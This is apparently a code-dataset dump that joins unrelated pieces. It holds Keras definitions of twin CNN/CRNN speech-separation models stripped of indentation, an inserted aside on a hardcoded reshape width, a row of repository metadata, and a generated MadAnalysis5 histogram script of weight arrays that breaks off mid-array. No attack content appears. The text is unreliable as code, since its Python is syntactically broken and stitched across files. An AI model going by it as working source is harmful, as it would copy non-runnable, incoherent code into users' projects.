:param hl_nodes: number of hidden nodes
"""
inp_x = Input(shape=(bins,))
x = inp_x
x = Dense(hl_nodes)(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dropout(0.4)(x)
x = Dense(hl_nodes)(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dropout(0.4)(x)
x = Dense(hl_nodes)(x)
x = BatchNormalization()(x)
x = Dropout(0.4)(x)
out_l = Dense(bins, activation='linear', name="Out1")(x)
out_r = Dense(bins, activation='linear', name="Out2")(x)
model = Model(inputs=inp_x, outputs=[out_l, out_r])
model.compile(optimizer='adam', loss=keras.losses.mean_squared_error)
return model
def cnn_twin(bins, time_frames):
"""
CNN model
"Twin" implementation: the second branch uses dilation_rate=2
Used as a reference for the twin CRNN
Outputs: [Speaker1, Speaker2]
:param bins: number of frequency bins
:param time_frames: number of consecutive time frames
"""
in_l = Input(shape=(bins, time_frames, 1))
x = in_l
filters = 8
for i in range(2):
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = MaxPooling2D(pool_size=(1, 2))(x)
x = Dropout(0.25)(x)
filters *= 2
in_r = Input(shape=(bins, time_frames, 1))
y = in_r
filters = 8
for i in range(2):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(1, 2))(y)
y = Dropout(0.25)(y)
filters *= 2
y = Concatenate(axis=3)([x, y])
filters = 64
for i in range(1):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(1, 2))(y)
y = Dropout(0.25)(y)
filters *= 2
y = Flatten()(y)
y = Dense(2048, activation=LeakyReLU())(y) # 2048
y = BatchNormalization()(y)
y = Dropout(0.4)(y)
out_l = Dense(bins * time_frames, activation='linear')(y)
out_l = Reshape((bins, time_frames, 1))(out_l)
out_r = Dense(bins * time_frames, activation='linear')(y)
out_r = Reshape((bins, time_frames, 1))(out_r)
model = Model(inputs=[in_l, in_r], outputs=[out_l, out_r])
model.compile(optimizer='adam', loss=keras.losses.mean_squared_error)
return model
def crnn_mimo(bins, time_frames):
"""
Twin CRNN (second branch w/ dilation_rate=2)
Multiple inputs of a common shape
Multiple outputs ([Speaker1, Speaker2])
:param bins: Num. of freq. bins
:param time_frames: Num. of consecutive Time Frames
"""
in_l = Input(shape=(bins, time_frames, 1))
x = in_l
filters = 64
for i in range(2):
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = MaxPooling2D(pool_size=(2, 1))(x)
x = Dropout(0.25)(x)
filters //= 2
in_r = Input(shape=(bins, time_frames, 1))
y = in_r
filters = 64
for i in range(2):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', dilation_rate=2,
data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.25)(y)
filters //= 2
y = Concatenate(axis=3)([x, y])
filters = 32
for i in range(1):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 2, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.3)(y)
filters *= 2
y = Reshape((time_frames, 512))(y) # hardcoded: (time_frames, bins//8 * last_conv_filters)
y = LSTM(bins, return_sequences=True)(y)
y = Dropout(0.3)(y)
y = Flatten()(y)
out_l = Dense(bins * time_frames, activation='linear')(y)
out_l = Reshape((bins, time_frames, 1))(out_l)
out_r = Dense(bins * time_frames, activation='linear')(y)
out_r = Reshape((bins, time_frames, 1))(out_r)
model = Model([in_l, in_r], [out_l, out_r])
model.compile(optimizer='adam', loss=keras.losses.mean_squared_error)
return model
def crnn_mimo_PIT(bins, time_frames):
"""
Twin-CRNN
MIMO
Designed for Permutation Invariant Training
Makes use of custom_mse()
:param bins: Num of freq. bins
:param time_frames: Num of consecutive time frames
"""
in_l = Input(shape=(bins, time_frames, 1))
x = in_l
filters = 64
for i in range(2):
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = MaxPooling2D(pool_size=(2, 1))(x)
x = Dropout(0.25)(x)
filters //= 2
in_r = Input(shape=(bins, time_frames, 1))
y = in_r
filters = 64
for i in range(2):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', dilation_rate=2,
data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.25)(y)
filters //= 2
y = Concatenate(axis=3)([x, y])
filters = 32
for i in range(1):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 2, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.3)(y)
filters *= 2
y = Reshape((time_frames, 512))(y) # hardcoded: (time_frames, bins//8 * last_conv_filters)
y = LSTM(bins, return_sequences=True)(y)
y = Dropout(0.3)(y)
y = Flatten()(y)
out_l = Dense(bins * time_frames, activation='linear')(y)
out_l = Reshape((bins, time_frames, 1), name='out_l')(out_l)
out_r = Dense(bins * time_frames, activation='linear')(y)
out_r = Reshape((bins, time_frames, 1), name='out_r')(out_r)
model = Model(inputs=[in_l, in_r], outputs=[out_l, out_r])
losses = {'out_l': custom_mse(0), 'out_r': custom_mse(1)}
model.compile(loss=losses, optimizer='adam')
return model
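A small sketch of where the hardcoded 512 in Reshape((time_frames, 512)) comes from (crnn_reshape_width is an illustrative helper; bins=256 is an assumption inferred from the comment, not stated in the source):

```python
def crnn_reshape_width(bins, last_conv_filters=16, n_pools=3):
    # Each MaxPooling2D(pool_size=(2, 1)) halves the frequency axis,
    # and three pooling stages run before the Reshape, leaving
    # bins // 2**n_pools frequency rows with last_conv_filters channels.
    return (bins // 2 ** n_pools) * last_conv_filters

# With 256 frequency bins the flattened width is 32 * 16 = 512,
# matching the hardcoded Reshape((time_frames, 512)) above.
assert crnn_reshape_width(256) == 512
```

For any other bin count the Reshape target would have to change accordingly, e.g. bins=128 gives a width of 256.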
| 33.72119 | 120 | 0.609084 | 1,293 | 9,071 | 4.121423 | 0.100541 | 0.018015 | 0.05517 | 0.040533 | 0.80578 | 0.774629 | 0.764121 | 0.761118 | 0.761118 | 0.761118 | 0 | 0.031829 | 0.238011 | 9,071 | 268 | 121 | 33.847015 | 0.739149 | 0.103186 | 0 | 0.824468 | 0 | 0 | 0.049893 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.031915 | 0.010638 | 0.106383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b612e60e6a5ecce238a0ae0e68bae5fdf58faf6 | 59,366 | py | Python | optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_12.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_12.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_12.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | def selection_12():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(0.0,2000.0,401,endpoint=True)
# Creating data sequence: middle of each bin
xData = numpy.array([2.5,7.5,12.5,17.5,22.5,27.5,32.5,37.5,42.5,47.5,52.5,57.5,62.5,67.5,72.5,77.5,82.5,87.5,92.5,97.5,102.5,107.5,112.5,117.5,122.5,127.5,132.5,137.5,142.5,147.5,152.5,157.5,162.5,167.5,172.5,177.5,182.5,187.5,192.5,197.5,202.5,207.5,212.5,217.5,222.5,227.5,232.5,237.5,242.5,247.5,252.5,257.5,262.5,267.5,272.5,277.5,282.5,287.5,292.5,297.5,302.5,307.5,312.5,317.5,322.5,327.5,332.5,337.5,342.5,347.5,352.5,357.5,362.5,367.5,372.5,377.5,382.5,387.5,392.5,397.5,402.5,407.5,412.5,417.5,422.5,427.5,432.5,437.5,442.5,447.5,452.5,457.5,462.5,467.5,472.5,477.5,482.5,487.5,492.5,497.5,502.5,507.5,512.5,517.5,522.5,527.5,532.5,537.5,542.5,547.5,552.5,557.5,562.5,567.5,572.5,577.5,582.5,587.5,592.5,597.5,602.5,607.5,612.5,617.5,622.5,627.5,632.5,637.5,642.5,647.5,652.5,657.5,662.5,667.5,672.5,677.5,682.5,687.5,692.5,697.5,702.5,707.5,712.5,717.5,722.5,727.5,732.5,737.5,742.5,747.5,752.5,757.5,762.5,767.5,772.5,777.5,782.5,787.5,792.5,797.5,802.5,807.5,812.5,817.5,822.5,827.5,832.5,837.5,842.5,847.5,852.5,857.5,862.5,867.5,872.5,877.5,882.5,887.5,892.5,897.5,902.5,907.5,912.5,917.5,922.5,927.5,932.5,937.5,942.5,947.5,952.5,957.5,962.5,967.5,972.5,977.5,982.5,987.5,992.5,997.5,1002.5,1007.5,1012.5,1017.5,1022.5,1027.5,1032.5,1037.5,1042.5,1047.5,1052.5,1057.5,1062.5,1067.5,1072.5,1077.5,1082.5,1087.5,1092.5,1097.5,1102.5,1107.5,1112.5,1117.5,1122.5,1127.5,1132.5,1137.5,1142.5,1147.5,1152.5,1157.5,1162.5,1167.5,1172.5,1177.5,1182.5,1187.5,1192.5,1197.5,1202.5,1207.5,1212.5,1217.5,1222.5,1227.5,1232.5,1237.5,1242.5,1247.5,1252.5,1257.5,1262.5,1267.5,1272.5,1277.5,1282.5,1287.5,1292.5,1297.5,1302.5,1307.5,1312.5,1317.5,1322.5,1327.5,1332.5,1337.5,1342.5,1347.5,1352.5,1357.5,1362.5,1367.5,1372.5,1377.5,1382.5,1387.5,1392.5,1397.5,1402.5,1407.5,1412.5,1417.5,1422.5,1427.5,1432.5,1437.5,1442.5,1447.5,1452.5,1457.5,1462.5,1467.5,1472.5,1477.5,1482.5,1487.5,1492.5,1497.5,1502.5,1507.5,1512.5,1517.5,1522.5,1527.5,1532.5,1537.5,1542.5,1547.5,1552.5,1557.5,1562.5,1567.5,157
2.5,1577.5,1582.5,1587.5,1592.5,1597.5,1602.5,1607.5,1612.5,1617.5,1622.5,1627.5,1632.5,1637.5,1642.5,1647.5,1652.5,1657.5,1662.5,1667.5,1672.5,1677.5,1682.5,1687.5,1692.5,1697.5,1702.5,1707.5,1712.5,1717.5,1722.5,1727.5,1732.5,1737.5,1742.5,1747.5,1752.5,1757.5,1762.5,1767.5,1772.5,1777.5,1782.5,1787.5,1792.5,1797.5,1802.5,1807.5,1812.5,1817.5,1822.5,1827.5,1832.5,1837.5,1842.5,1847.5,1852.5,1857.5,1862.5,1867.5,1872.5,1877.5,1882.5,1887.5,1892.5,1897.5,1902.5,1907.5,1912.5,1917.5,1922.5,1927.5,1932.5,1937.5,1942.5,1947.5,1952.5,1957.5,1962.5,1967.5,1972.5,1977.5,1982.5,1987.5,1992.5,1997.5])
# Creating weights for histo: y13_PT_0
y13_PT_0_weights = numpy.array([0.184233745582,0.537348599613,0.782993643722,1.16681392202,1.6427506231,1.96516035287,2.3182750569,2.87097659365,3.25479627194,3.27015025907,4.31414038404,4.25273043551,4.51372721675,6.01830395566,5.89548105861,5.92618603287,6.58635797954,7.32329236187,8.56687081954,8.9813969721,8.95069199784,9.64156741877,10.485972211,11.8677260529,11.0386737478,12.3129571797,12.466486551,12.8656587164,14.8308190693,14.7540551337,15.8287517329,15.7980467586,16.7806209351,18.3619646096,17.8399650472,19.1449639533,19.7590784386,21.2943571518,20.7109476408,22.1234064569,22.6914559808,23.6279801958,24.4109795396,23.2748654918,24.8869141406,25.0097340377,24.1039147969,25.4856686388,27.2512421589,26.3147179439,26.3761428924,27.6350618372,27.2973071203,28.8018808593,28.8479458206,29.001470692,29.9533398941,29.8612249713,30.3678645467,30.0301098298,29.8458799842,29.1396505761,28.9093557692,29.3699303831,29.7077001,26.8674224806,27.5122419402,25.5624385744,26.0537331627,27.2051921975,25.3014387932,25.8387833428,25.7313234329,24.7794392307,23.3669804146,24.1806847326,24.1346197712,23.0445706848,22.829635865,23.1674055819,22.7682259165,22.3997512253,22.2001763926,21.4478820231,20.4038978982,20.8337675378,21.5707019202,19.5441286188,20.3271279625,19.0374890434,18.6997343265,19.6516035287,18.6536693651,18.6997343265,18.4694395195,17.1337356391,17.6250302273,16.074391527,16.6731610251,16.0283415656,16.427506231,16.2739813597,16.1818664369,15.0457523892,15.1532272991,14.2474125583,14.9843469406,14.4623518782,13.9403568157,13.8942978543,14.0171207513,13.4183602532,13.3876552789,13.4183602532,12.3283111668,12.1440768213,12.2976046926,12.1594293084,12.4050751025,11.9291375014,12.2515472312,11.652786733,11.4685523875,11.8523735657,11.3457309904,11.2843195419,10.6395015823,11.1154376834,10.3017393654,9.84115425148,10.5780901338,9.68762638016,10.5780901338,9.82580176435,9.33451167613,9.6108624445,9.79509679009,8.78181013939,9.58015597024,8.39799046109,8.6896937166,7.8452
8892435,7.90670037287,8.32122652543,8.16769715412,8.10628570559,7.81458245008,7.81458245008,7.10835304202,7.27723490047,6.9548251707,7.09300055489,7.55358566884,6.9548251707,6.63241544094,6.40212363396,6.60171046667,6.81664978652,5.74195318729,6.00295146853,6.55565150528,6.67847440233,6.64776942807,5.81871712295,5.66518925163,5.52701386745,5.94154002,5.58842531597,5.68054173876,5.57307132884,5.29672056047,5.43489594466,5.32742703473,5.25066309907,5.23531061194,5.23531061194,4.62119762667,4.45231576822,4.48302224248,4.95895984357,4.62119762667,4.75937301086,4.22202396124,4.65190260093,4.25273043551,4.11455505132,4.14526002559,4.22202396124,4.0070846414,3.80749780869,3.86890925721,3.89961573148,3.60791097597,3.76144034729,4.22202396124,3.74608636016,3.70002889876,3.70002889876,3.42367813039,3.56185351458,3.53114704031,3.51579455318,3.60791097597,2.91703555504,3.0398569521,3.08591591349,3.22409129768,3.07056342636,2.76350618372,2.87097659365,2.67138976093,2.41039147969,2.87097659365,3.10126840062,2.64068478667,2.85562410651,2.53321437675,2.79421265799,2.42574546682,2.42574546682,2.56392085101,2.53321437675,2.30292256977,2.21080464698,2.13404071132,2.30292256977,2.16474718558,2.7020947352,2.21080464698,2.16474718558,2.13404071132,1.91910139147,1.90374890434,1.79627999442,2.21080464698,2.0265718014,1.94980786574,2.11868822419,1.59669316171,1.90374890434,1.81163248155,1.71951455876,1.88839641721,1.85768994295,1.67345709737,2.19545215985,1.65810461023,1.45851747752,1.56598668744,1.3510476676,1.24357800768,1.6427506231,1.76557352016,1.6427506231,1.42781175326,1.42781175326,1.59669316171,1.38175339186,1.41245896613,1.56598668744,1.50457523892,1.44316469039,1.16681392202,1.48922305178,0.967227389303,0.982580176435,1.16681392202,1.24357800768,1.09004983636,1.3510476676,1.21287243341,1.21287243341,1.13610834775,1.22822522054,1.0132857507,0.951874602171,0.997932963567,1.3510476676,0.859757579381,1.10540262349,1.18216670915,0.93652166504,0.997932963567,0.782993643722,0.7829936437
22,0.997932963567,1.02863868783,0.844404792249,0.921168877908,0.905816090776,0.875110516512,0.782993643722,0.736935132326,0.675523833799,0.782993643722,0.829052005117,0.875110516512,0.736935132326,0.736935132326,0.614112535272,0.721582345194,0.844404792249,0.844404792249,0.675523833799,0.675523833799,0.76764070659,0.460584513954,0.76764070659,0.706229558063,0.475937301086,0.644818259535,0.660171046667,0.491290088217,0.59875974814,0.614112535272,0.583406961008,0.629465472404,0.42987878969,0.59875974814,0.59875974814,0.491290088217,0.644818259535,0.59875974814,0.706229558063,0.399173215427,0.368467491163,0.506642875349,0.460584513954,0.491290088217,0.491290088217,0.491290088217,0.445231576822,0.445231576822,0.353114704031,0.399173215427,0.322409129768,0.475937301086,0.353114704031,0.460584513954,0.383820428295,0.42987878969,0.475937301086,0.353114704031,0.368467491163,0.414526002559,0.307056342636,0.322409129768,0.414526002559,0.414526002559,0.399173215427,0.353114704031,0.214939469845,0.353114704031,0.353114704031,0.3377619169,0.260997831241,0.276350618372,0.260997831241,0.307056342636,0.307056342636,0.353114704031,0.307056342636,0.16888095845,0.276350618372,0.307056342636,0.291703555504,0.260997831241,0.276350618372,0.307056342636,0.214939469845,0.107469704923,0.291703555504,0.276350618372,0.214939469845,0.260997831241,0.260997831241,0.260997831241,0.230292256977,0.214939469845,0.16888095845,0.214939469845,0.230292256977,0.245645044109,0.153528171318,0.199586532713,0.138175339186,0.122822522054,0.122822522054,0.0921168877908,0.214939469845,0.16888095845,0.107469704923,0.276350618372,0.245645044109,0.16888095845,0.214939469845,0.16888095845,0.245645044109,0.230292256977,0.122822522054])
# Creating weights for histo: y13_PT_1
y13_PT_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0912968591919,0.0,0.0,0.0454653083971,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0454926924109,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_2
y13_PT_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0375985630792,0.0375985630792,0.0751969092266,0.0376018480483,0.037652734079,0.0,0.0,0.0376234482696,0.0377193011884,0.0376123382562,0.03776126202,0.1129777571,0.0752863006732,0.0377260880585,0.188461155919,0.225943427993,0.0751962584308,0.112985504669,0.112761568946,0.0752603153281,0.150718519054,0.188208120328,0.0375701449976,0.112897941648,0.225815593111,0.112934649628,0.0376996843447,0.150720750353,0.113014511566,0.0752610745898,0.112927986719,0.226030200761,0.0376123382562,0.112913917135,0.0376333651574,0.0375576094316,0.0375985630792,0.0377286912416,0.0375576094316,0.0752228790765,0.0375701449976,0.0752773134936,0.112953460725,0.112804862359,0.0377635862906,0.0376714986901,0.03776126202,0.0377286912416,0.0,0.0,0.0376376263202,0.0,0.0376996843447,0.0,0.0,0.0,0.0,0.0,0.0376216663288,0.0,0.0,0.0,0.0,0.0752340045851,0.0376714986901,0.0,0.0,0.0,0.0,0.0376278488886,0.0377132115995,0.0375985630792,0.0,0.0,0.0,0.0,0.0377049526914,0.0,0.0,0.0,0.0,0.0377132115995,0.0,0.0377132115995,0.0,0.0,0.0,0.0,0.0,0.0376216663288,0.0,0.0,0.03776126202,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_3
y13_PT_3_weights = numpy.array([0.0,0.0,0.0206173151769,0.144168676778,0.206205449258,0.14430706847,0.144348918093,0.12361880546,0.185689536008,0.14441060325,0.268116992796,0.0823421883714,0.226891381364,0.165088918023,0.412619156379,0.185787647247,0.309546901079,0.350681256871,0.433226020576,0.2062375944,0.350633877065,0.453875541834,0.412182226202,0.371058382328,0.432826415327,0.288764381201,0.391784990988,0.247310706841,0.268078601442,0.433177574343,0.371182392497,0.516043027735,0.391823839382,0.722228824276,0.433208348365,0.288832784844,0.41265952824,0.535830266984,0.433087385129,0.66011283154,0.41263637155,0.412574366465,0.433062095586,0.330053521184,0.329859583905,0.226934038424,0.350629459012,0.371462253283,0.391765338271,0.18558182693,0.185637128762,0.37157361868,0.330193375404,0.329816469805,0.226835317798,0.247552328619,0.164868320081,0.309543701799,0.165002385129,0.206495821963,0.165075663865,0.330281127071,0.206253286104,0.24731664836,0.206283603087,0.268185548786,0.144401172992,0.082499623394,0.144527133198,0.082430244732,0.330095721204,0.082573222058,0.144296830775,0.165119082659,0.0618462477662,0.0824471095055,0.144540935804,0.0620128388222,0.103130192729,0.123837605712,0.0619774639313,0.0618680485711,0.0618347760639,0.0825847699337,0.0824654520416,0.123819994439,0.0618437645159,0.0206434883305,0.0412365499216,0.0205963979826,0.082550248184,0.0412681466157,0.0206173151769,0.0411700049072,0.0412723666177,0.0205470376697,0.0,0.0412543135403,0.0619128994233,0.0,0.0206242317146,0.0411644899586,0.0206213218937,0.0,0.0206783147734,0.0,0.0,0.0,0.0412052731554,0.0205802340036,0.0,0.0,0.0,0.0,0.0206614804692,0.0,0.0,0.0,0.0,0.0206405480402,0.0,0.0412488290611,0.0206022176244,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0205802340036,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206041067228,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0205677872827,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0206099263647,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206783147734,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,